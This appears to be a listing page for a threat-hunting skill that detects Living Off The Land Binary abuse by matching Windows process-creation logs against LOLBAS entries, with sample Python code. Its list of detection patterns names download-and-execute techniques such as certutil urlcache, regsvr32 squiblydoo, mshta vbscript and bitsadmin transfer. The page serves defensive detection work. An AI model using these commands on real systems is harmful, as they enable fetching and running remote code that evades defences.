LOLBAS Detection Rules

v20260317

hunting-living-off-the-land-binaries

Monitors Windows process creation events to flag Living Off The Land Binary abuse by matching Event ID 4688/Sysmon 1 logs against LOLBAS database entries, supporting threat hunting and SIEM rule creation for fileless attacks.

Cybersecurity ThreatHunting SIEM LOLBAS Windows Detection Automation

Get Skill

103 downloads

Overview

Hunting Living Off The Land Binaries

Instructions

Detect LOLBAS abuse by analyzing Windows process creation events (Event ID 4688 / Sysmon 1) and matching command lines against known malicious patterns from the LOLBAS project.

import json
import requests

# Fetch LOLBAS database
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json")
lolbas_db = resp.json()

# Extract binary names and suspicious commands
for entry in lolbas_db:
    print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])

Key detection patterns:

certutil -urlcache -split -f (download)
mshta vbscript:Execute (script execution)
regsvr32 /s /n /u /i:http (squiblydoo)
rundll32 javascript: (script execution)
wmic process call create (process creation)
bitsadmin /transfer (download)

Examples

# Match Sysmon Event ID 1 against LOLBAS patterns
import Evtx.Evtx as evtx
with evtx.Evtx("Microsoft-Windows-Sysmon.evtx") as log:
    for record in log.records():
        xml = record.xml()
        if "certutil" in xml.lower() and "urlcache" in xml.lower():
            print(f"LOLBAS detected: {xml}")

Info

Category Development

Name hunting-living-off-the-land-binaries

Version v20260317

Size 8.25KB

Source mukul975/Anthropic-Cybersecurity-Skills

Updated At 2026-03-18